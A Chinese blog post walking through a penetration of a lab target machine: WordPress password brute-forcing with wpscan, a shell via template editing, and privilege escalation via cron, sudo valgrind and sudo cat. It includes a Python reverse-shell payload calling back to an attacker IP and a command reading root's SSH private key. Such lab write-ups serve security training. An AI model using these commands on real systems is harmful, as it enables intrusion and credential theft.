靶机渗透日记

最新推荐文章于 2024-08-16 10:05:19 发布
最新推荐文章于 2024-08-16 10:05:19 发布
阅读量156 收藏
点赞数
文章标签: 安全 web安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47709391/article/details/123231660
版权

  1. 端口

    在这里插入图片描述

  2. 访问 80 端口

    在这里插入图片描述

    wordpress 搭建的网站

  3. 目录扫描

    在这里插入图片描述

  4. 使用 wpscan 扫描

    在这里插入图片描述

    没有扫描到插件信息,但是扫描到了 admin 用户

    爆破 admin

    wpscan --url http://192.168.0.134 -U admin -P /usr/share/wordlists/rockyou.txt

    在这里插入图片描述

  5. 得到账号密码,登录后台,编辑模板成功GETSHELL

    在这里插入图片描述

  6. 信息收集

    ls -al /var/www/.bash_history

    在这里插入图片描述

    结合下面 su - father 语句,perso.txt 中就是该用户的密码

  7. 发现mother目录属于father组,由于完全控制权限

    在这里插入图片描述

    发现每隔一段时间以 mother 用户(UID=1001)运行 check.py

    将反弹shell写入check.py

    import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.128",6666))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

    在这里插入图片描述

  8. mother 可以以baby运行valgrind

    在这里插入图片描述

    sudo -u baby valgrind /bin/bash

    在这里插入图片描述

  9. cat 具有 sudo 权限

    sudo cat /root/.ssh/id_rsa

    得到 root 用户的私钥,免密码登录ssh

    登录ssh会自动断开连接,发现在 /root/authorized_keys 执行了 /root/troll.sh,该文件先运行查看了welcome.txt,然后 exit ,这里需要绕过 more

    stty columns 50 rows 50
!/bin/bash
# .
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机渗透日记 messages
Anonymous
02-26 368
IP 端口 访问 80 端口 两个功能点,一个是 chatbot ,一个是 Webmail 对这两部分进行目录扫描 发现在 /chatbot 目录下存在 后台登陆页面 寻找源码,关键字 Simple ChatBot Application 得到后台的默认密码,成功访问 登录到后台发现可以上传头像,上传一个 webshell ,这里上传一句话发现怎么都无法连接,并且我只能上传到 user_avatar ,上传到 bot_avatar 上会变成 jsp 后缀文件 在 /h..
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Animetronic - hackmyvm
tanbinn的博客
08-12 469
hackmyvm的Animetronic靶场
H5直播行业的安全挑战:为何害怕黑客攻击?
@云安全小杜
08-13 429
随着移动互联网的快速发展,H5直播因其便捷性和互动性成为众多平台的选择。然而,这种开放性和交互性也带来了安全风险,使得H5直播行业成为了黑客攻击的目标之一。本文将探讨H5直播面临的常见威胁,并提供一些基本的防御措施。
GPS叉车安全管理系统,远程监控管理车辆,保障叉车资产安全
jiuxindianzi的博客
08-16 316
九盾叉车监管系统利用GPS技术实现叉车全面监管,含IC卡指纹认证、无线实时测速、安全带报警器及小程序后台管理,提升安全性、效率及管理水平,降低运营成本。
IDS 与 IPS:网络安全的两道防线
hakksjss的博客
08-16 147
然而,IDS 也存在一定的局限性。它就像是网络世界中的“哨兵”,时刻保持警惕,依据一定的安全策略,分析网络数据包、系统日志等信息,试图发现各种潜在的攻击企图、入侵行为以及异常活动。此外,IPS 的误报率也是一个需要关注的问题,如果错误地拦截了正常的流量,可能会影响业务的正常运行。如果确定为攻击行为,IPS 则根据预先设置的规则和策略,立即阻断相关的流量,防止攻击对网络造成更大的破坏。它串联在网络中,实时分析流经的网络流量,一旦发现与已知攻击模式或异常行为相符的流量,立即采取行动,防止攻击的进一步扩散。
如何选择较为安全的第三方依赖版本?
最新发布
极客星云-CSDN博客
08-16 43
本篇博文分享如何选择较为安全的第三方依赖版本的方法。
企业如何组建安全稳定的跨国通信网络
TIANGEKUAJING的博客
08-13 241
当企业在海外设有分公司时,如何建立一个安全且稳定的跨国通信网络是一个关键问题。为了确保跨国通信的安全和稳定性,可以考虑以下几种方案。
Scout Suite:开源云安全审计工具
网络研究观
08-12 336
Scout Suite 是一个开源、多云安全审计工具,旨在评估云环境的安全态势。
安全自动化和编排:如何使用自动化工具和编排技术来提高安全操作效率。(第二篇)
艰难的活着
08-13 983
深入理解Kubernetes环境中的安全自动化与编排(第二篇)
Linux安全与高级应用(十二)深入探讨Linux系统中的YUM仓库服务与PXE网络装机
洛秋的博客
08-12 1152
YUM(Yellowdog Updater Modified)是基于RPM包管理的一种软件更新机制,它能够自动解决软件包之间的依赖关系,并且所有的软件包都来自集中的YUM仓库。YUM仓库是一种存储RPM包的集合,可以通过多种方式(如FTP、HTTP或本地目录)提供给客户机,客户机可以通过配置YUM仓库位置来获取和安装所需的软件包。YUM仓库服务与PXE网络装机是Linux系统管理中的两个关键技术,通过它们,管理员可以高效地管理软件包和进行大规模的系统部署。这不仅提高了工作效率,也增强了系统的稳定性和安全性。
文件上传-.htaccess利用
feiwujiushiwo的博客
08-13 391
限于Apache.htaccess文件是服务器中的一个配置文件,它负责相关目录下的网页配置。笼统地说,.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。
守护数字堡垒:全面掌握安全配置管理
2401_85761762的博客
08-13 623
安全配置管理是确保系统安全的重要环节。通过本文的详细介绍,读者应该对SCM有了全面的认识。实施有效的SCM策略,可以帮助组织降低安全风险,提高系统稳定性和合规性。通过本文,我们提供了一个全面的指南,帮助读者理解SCM的概念、重要性以及如何在实践中应用SCM。记住,持续的监控和改进是确保SCM成功的关键。
超网和无类间路由是什么?
m0_73609283的博客
08-14 941
CIDR允许更灵活的IP地址分配,减少了地址空间的浪费。例如,一个企业可能需要一个完整的B类地址空间(65536个地址),但又超过了C类地址空间(256个地址)在这种情况下,CIDR可以明确分配一个合理的地址范围(如1024个地址),从而避免地址的浪费。无类间路由(CIDR)是一种新的IP地址分配方法,取代了传统的基于类的分配方法。通过合并连续的子网,超网可以减少路由入侵的数量,从而提高网络的效率。总之,超网和无类间路由技术提高了IP地址的利用效率,还简化了路由表管理,支持网络的灵活扩展。
hackbox靶机渗透
10-15
好的,关于hackbox靶机渗透,我可以提供一些基本的信息和建议。首先,hackbox是一个虚拟机靶机,可以用于练习渗透测试技能。在渗透测试过程中,需要进行信息收集、漏洞扫描、漏洞利用等步骤。以下是一些可能有用的工具和技术: 1. Nmap:用于端口扫描和服务识别。 2. Metasploit:用于漏洞利用和后渗透。 3. Hydra:用于暴力破解密码。 4. Burp Suite:用于Web应用程序渗透测试。 5. SQL注入、XSS等常见漏洞的利用方法。 当然,这只是一些基本的工具和技术,实际的渗透测试需要根据具体情况进行选择和使用。此外,还需要注意法律和道德问题,不要进行未经授权的渗透测试
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值